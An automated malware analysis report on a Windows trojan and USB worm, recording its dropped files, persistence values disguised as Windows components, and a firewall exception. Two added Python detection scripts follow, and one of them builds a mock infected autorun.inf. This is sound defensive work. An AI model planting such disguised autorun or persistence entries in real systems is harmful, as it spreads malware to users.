Trojan.GenericKD.2067268_34bede60c0

by malwarelabrobot on January 13th, 2015 in Malware Descriptions.

Trojan.Win32.Agent.amobq (Kaspersky), Trojan.GenericKD.2067268 (B) (Emsisoft), Trojan.GenericKD.2067268 (AdAware), mzpefinder_pcap_file.YR, GenericAutorunWorm.YR, GenericInjector.YR, GenericIRCBot.YR, TrojanDropperVtimrun.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, WormAutorun, IRCBot


This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 34bede60c04552c0b0bcad13848048aa
SHA1: e9e2bbd8e7c287ff5656af24136721dde305c1e0
SHA256: 6c4e4620e2ca96f368cdcc0314fcb78c8efdefde4830828bccbe83456d2a1dc3
SSDeep: 3072:eoDuN20X5hzHfUSESmnl/4cOTPfQl/4cOTPfK:e3lLUSHtLTlLTK
Size: 135818 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-12-27 16:02:54
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
WormAutorun A worm that spreads via removable drives: it writes its executable to every removable drive and creates an "autorun.inf" file beside it. That file launches the Trojan's executable when a user opens the drive in Windows Explorer, on systems where AutoRun is still enabled for removable media (Microsoft turned it off by default in 2011).
IRCBot A bot that communicates with its command-and-control server over an IRC channel.


Process activity

The Trojan creates the following process(es):

Cyanide.exe:348
Cyanide.exe:1972
winsvc32.exe:344
Ganja145.exe:1436
NESbot.exe:612
NESbot.exe:1388

The Trojan injects its code into the following process(es):

msconfig.exe:1532
%original file name%.exe:772
hhh.exe:388

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process msconfig.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\msn[1].exe (15430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\google_cache2.tmp (9 bytes)

The process Cyanide.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\msconfig.exe (30 bytes)

The process %original file name%.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cyanide.exe (60 bytes)

The process hhh.exe:388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\NESbot.exe (132 bytes)

The process Ganja145.exe:1436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\hhh.exe (4984 bytes)

The process NESbot.exe:1388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\winsvc32.exe (601 bytes)

Registry activity

The process msconfig.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Ganja145.exe" = "Win32 Cabinet Self-Extractor"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 CA 87 D0 FE C0 18 7D C5 D6 BC 2F 19 D9 8C A3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan writes Internet Explorer zone-map settings. "UNCAsIntranet" = 1 maps all UNC network paths to the Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

"ProxyBypass" = 1 maps all sites that bypass the proxy server to the Intranet zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To run itself each time Windows boots, the Trojan adds a reference to its file under the machine-wide autorun key. Both the value name "WindowsUpdate" and the file name msconfig.exe imitate Windows components; the genuine msconfig.exe ships with Windows and is never found in a user's Application Data folder:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

"IntranetName" = 1 maps all local (intranet) sites not listed in other zones to the Intranet zone. These three ZoneMap values are Internet Explorer's defaults for the Local intranet zone and are typically created the first time a process initialises the IE zone security manager (for example through URLDownloadToFileA, which this sample imports), so on their own they are a weak indicator:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Adds the file to the Windows Firewall list of authorized applications, which exempts it from the firewall's inbound filtering:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

The same reference is added under the per-user autorun key, so the Trojan is started at logon even if the HKLM write failed for lack of administrative rights:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

The Trojan deletes the following value(s) from the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Cyanide.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 1B 90 B5 0C ED 82 71 0B E0 4D 73 C4 0D B0 82"

The process Cyanide.exe:1972 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 13 39 0B 6D 45 02 5D 03 13 7E 88 83 64 1B 48"

The process %original file name%.exe:772 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA DE 2F 50 06 CA B9 13 BD 6A 53 5C 75 18 CD 88"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"Cyanide.exe" = "Cyanide"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan writes Internet Explorer zone-map settings (these are IE's defaults for the Local intranet zone and a weak indicator on their own). "UNCAsIntranet" = 1 maps all UNC network paths to the Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

"IntranetName" = 1 maps all local (intranet) sites not listed in other zones to the Intranet zone:

"IntranetName" = "1"

"ProxyBypass" = 1 maps all sites that bypass the proxy server to the Intranet zone:

"ProxyBypass" = "1"

The process hhh.exe:388 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 17 E2 02 8A 7D 3F D8 66 F6 5E 6A 36 C2 73 EA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"NESbot.exe" = "NESbot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan writes Internet Explorer zone-map settings (these are IE's defaults for the Local intranet zone and a weak indicator on their own). "UNCAsIntranet" = 1 maps all UNC network paths to the Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

"IntranetName" = 1 maps all local (intranet) sites not listed in other zones to the Intranet zone:

"IntranetName" = "1"

"ProxyBypass" = 1 maps all sites that bypass the proxy server to the Intranet zone:

"ProxyBypass" = "1"

The process winsvc32.exe:344 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B D8 6D 7E 7B AB A8 BE FD 12 70 E7 30 01 AC B9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process Ganja145.exe:1436 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 04 94 A9 80 2D A8 DC 21 33 F5 F0 F4 AB 84 A3"

The self-extracting cabinet (Win32 Cabinet Self-Extractor, wextract) registers a RunOnce entry that deletes its temporary extraction folder at the next logon. This is wextract's standard clean-up, executed once through advpack.dll's DelNodeRunDLL32; it is not a persistence mechanism for the Trojan:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

The process NESbot.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 58 BE 2D E9 FB 0D 86 63 DC A2 62 85 F0 08 23"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process NESbot.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 E2 95 EC 3F 2E 23 17 7A 68 08 D3 4D 10 A5 64"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

To run itself each time Windows boots, the Trojan adds a reference to its file under the autorun key. The value holds only a file name, no path; it resolves because the dropped copy sits in %WinDir%, which is on the search path used when Run entries are started:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winsvc32" = "winsvc32.exe"
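
The autorun and firewall entries recorded above (the "WindowsUpdate" Run values pointing at msconfig.exe in Application Data, the matching Windows Firewall exception, and the path-less "winsvc32" value) as a detection routine. This is an added example in Python, not the Lavasoft tool's own logic: it parses a registry export in .reg format and flags Run/RunOnce values and enabled firewall exceptions whose image sits in a user-writable profile folder, is given as a bare file name, or pairs a system-sounding value name with a non-system path. The firewall list data format, `path:*:Enabled:name`, is the one visible in the string dump as `%s:*:Enabled:%s`. The .reg text is constructed from the report's values plus one assumed benign entry for contrast; the trusted-directory list and the name heuristic are assumptions.

```python
"""Audit Run/RunOnce autorun values and Windows Firewall exceptions.

Added example, not part of the Lavasoft report. SAMPLE_REG is constructed
from the values in the report plus one assumed benign entry; the trusted
directory list and the "system-sounding name" heuristic are assumptions.
"""
import re

RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")
FIREWALL_LIST = "\\authorizedapplications\\list"
TRUSTED_DIRS = ("\\windows\\", "\\winnt\\", "\\program files")          # assumption
USER_WRITABLE = ("\\application data\\", "\\appdata\\", "\\local settings\\temp\\", "\\temp\\")
SYSTEM_SOUNDING = ("windows", "microsoft", "driver")                    # assumption

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
EXE_RE = re.compile(r'^"?(.*?\.exe)"?', re.I)
# Firewall list data format, also visible in the dump as "%s:*:Enabled:%s".
FW_RE = re.compile(r"^(.*?):([^:]*):(Enabled|Disabled):(.*)$", re.I)


def _unescape(s):
    # Undo .reg escaping: doubled backslashes and escaped quotes.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Return (key, value_name, data) for every string value in a .reg export."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if key and m:
            entries.append((key, _unescape(m.group(1)), _unescape(m.group(2))))
    return entries


def image_path(data):
    """Extract the executable path from a Run value (quoted or not, with or without arguments)."""
    m = EXE_RE.match(data.strip())
    return m.group(1) if m else data.strip()


def suspicious_reasons(name, path):
    """Heuristics for an autorun image path paired with its value name."""
    p = path.lower()
    reasons = []
    if "\\" not in path:
        reasons.append("bare file name, resolved through the search path")
    if any(tag in p for tag in USER_WRITABLE):
        reasons.append("image in a user-writable profile folder")
    if name.lower().startswith(SYSTEM_SOUNDING) and not any(tag in p for tag in TRUSTED_DIRS):
        reasons.append("system-sounding value name outside a system directory")
    return reasons


def audit(reg_text):
    """Return a list of findings, one per flagged Run value or enabled firewall exception."""
    findings = []
    for key, name, data in parse_reg(reg_text):
        k = key.lower()
        if k.endswith(RUN_KEYS):
            path = image_path(data)
            reasons = suspicious_reasons(name, path)
            if reasons:
                findings.append({"key": key, "name": name, "path": path, "reasons": reasons})
        elif k.endswith(FIREWALL_LIST):
            m = FW_RE.match(data)
            if not m:
                continue
            path, _scope, state, label = m.groups()
            reasons = suspicious_reasons(label, path)
            if state.lower() == "enabled" and reasons:
                findings.append({"key": key, "name": label, "path": path,
                                 "reasons": ["firewall exception: " + r for r in reasons]})
    return findings


# Constructed .reg export: the three entries from the report plus one assumed benign one.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate"="C:\\Documents and Settings\\user\\Application Data\\msconfig.exe"
"winsvc32"="winsvc32.exe"
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\" -n vmusr"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Documents and Settings\\user\\Application Data\\msconfig.exe"="C:\\Documents and Settings\\user\\Application Data\\msconfig.exe:*:Enabled:WindowsUpdate"
'''


if __name__ == "__main__":
    for f in audit(SAMPLE_REG):
        print(f["name"], "->", f["path"])
        for r in f["reasons"]:
            print("   ", r)
```

On a live host the input would come from `reg export` of the same keys; the heuristics are deliberately simple so that a bare file name or a profile-folder path is flagged without a signature for this specific sample.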

Dropped PE files

MD5 File path
d6152e2c63bb3e7d4b8f5abf9c76aecf c:\Documents and Settings\"%CurrentUserName%"\Application Data\msconfig.exe
d6152e2c63bb3e7d4b8f5abf9c76aecf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Cyanide.exe

Both files have the same MD5: the msconfig.exe in Application Data is a byte-for-byte copy of the dropped Cyanide.exe, renamed after the Windows System Configuration utility.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm that spreads via removable drives: it writes its executable to every removable drive and creates an "autorun.inf" file beside it. That file launches the Trojan's executable when a user opens the drive in Windows Explorer, on systems where AutoRun is still enabled for removable media (Microsoft turned it off by default in 2011).
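
The propagation step above in code, as an added example that is not part of the Lavasoft report or the sample itself: a Python scanner that checks a drive root for an autorun.inf that launches an executable and for a Desktop.ini carrying the Recycle Bin CLSID, which is the pair of files the string dump suggests the worm writes (`\autorun.inf`, `[.ShellClassInfo]`, `CLSID={645FF040-5081-101B-9F08-00AA002F954E}`, `icon=%SystemRoot%\system32\SHELL32.dll,2`, `usbBlock.exe`). The sample files are constructed in a temporary directory standing in for a removable drive; that usbBlock.exe is the launched file and that the Desktop.ini sits in a subfolder are assumptions.

```python
"""Triage scanner for the removable-drive propagation pattern above.

Added example, not part of the Lavasoft report. The autorun.inf and
Desktop.ini contents in build_sample_drive() are constructed from the
strings seen in the dump; that usbBlock.exe is the launched file and that
the Desktop.ini sits in a subfolder are assumptions.
"""
import configparser
import os
import shutil
import tempfile

RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"  # CLSID seen in the string dump
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text):
    """Return every command an autorun.inf would run: open=, shellexecute=,
    and shell\\<verb>\\command= entries under [autorun]."""
    cp = configparser.RawConfigParser(strict=False, allow_no_value=True, delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return []
    cmds = []
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, val in cp.items(section):
            key = key.lower()
            launches = key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))
            if val and launches:
                cmds.append(val.strip())
    return cmds


def desktop_ini_masquerades(text):
    """True if a Desktop.ini assigns the folder the Recycle Bin's CLSID, which
    makes Explorer show it with the Recycle Bin's icon and behaviour."""
    return RECYCLE_BIN_CLSID.lower() in text.lower()


def scan_root(root):
    """Scan one drive root; return a list of (finding, path, detail) tuples."""
    findings = []
    inf = os.path.join(root, "autorun.inf")
    if os.path.isfile(inf):
        with open(inf, encoding="utf-8", errors="replace") as fh:
            for cmd in parse_autorun(fh.read()):
                findings.append(("autorun-launch", inf, cmd))
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                if desktop_ini_masquerades(fh.read()):
                    findings.append(("recycle-bin-masquerade", path, RECYCLE_BIN_CLSID))
    return findings


def build_sample_drive():
    """Create a temp directory laid out like an infected removable drive (constructed)."""
    root = tempfile.mkdtemp(prefix="usb_")
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write("[autorun]\n"
                 "open=usbBlock.exe\n"
                 "shellexecute=usbBlock.exe\n"
                 "shell\\open\\command=usbBlock.exe\n"
                 "icon=%SystemRoot%\\system32\\SHELL32.dll,2\n")
    hidden = os.path.join(root, "RECYCLER")          # assumed folder name
    os.mkdir(hidden)
    with open(os.path.join(hidden, "Desktop.ini"), "w") as fh:
        fh.write("[.ShellClassInfo]\nCLSID=" + RECYCLE_BIN_CLSID + "\n")
    return root


def demo():
    """Scan the constructed drive and return the finding kinds in order."""
    root = build_sample_drive()
    try:
        return [kind for kind, _path, _detail in scan_root(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    root = build_sample_drive()
    for finding in scan_root(root):
        print(*finding, sep="\t")
    shutil.rmtree(root, ignore_errors=True)
```

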